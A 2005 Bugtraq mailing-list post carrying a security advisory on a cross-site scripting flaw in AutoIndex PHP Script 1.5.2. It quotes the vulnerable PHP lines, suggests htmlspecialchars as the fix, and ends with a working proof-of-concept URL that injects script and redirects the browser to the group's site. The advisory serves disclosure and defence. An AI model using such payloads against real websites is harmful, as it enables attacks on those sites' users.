[39413] in bugtraq
Re: [badroot security] AutoIndex PHP Script: XSS vulnerability
daemon@ATHENA.MIT.EDU (mozako)
Tue Jul 5 17:09:42 2005
Message-ID: <42CB09C4.1050303@mybox.it>
Date: Tue, 05 Jul 2005 22:29:24 +0000
From: mozako <mozako@mybox.it>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sorry for distraction errors.
This is the correct ADV:
_______________________________________________________
BADROOT SECURITY GROUP
Security Advisory 2005-#0x07
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
_______________________________________________________
Authors ....... mozako feat shen139
Date .......... 05-07-2005
Product ....... AutoIndex PHP Script
Type .......... Cross Site Scripting (XSS) vulnerability
o Description:
=============================
AutoIndex PHP Script is a simply website directory indexer and file
manager.
o Vulnerability Description:
=============================
287 [...]
288 $search = (isset($_GET['search']) ? $_GET['search'] : '');
289 $search_mode = (isset($_GET['searchMode']) ? $_GET['searchMode']
: '');
290 [...]
At line 289 AutoIndex PHP Script doesn't validate '$_GET' variable
($search).
Consequently, a remote user can create an specially crafted
URL that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server.
o Products:
=============================
- AutoIndex PHP Script v. 1.5.2 (tested)
o Solution:
=============================
Sanitize html source before writing it with a simply htmlspecialchars(...).
o Proof of concept:
=============================
http://www.vuln-site.org/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.badroot.org%27%3B%3C%2Fscript%3E&dir=&searchMode=
Original ADV: http://www.badroot.org/advisories/SA0x07
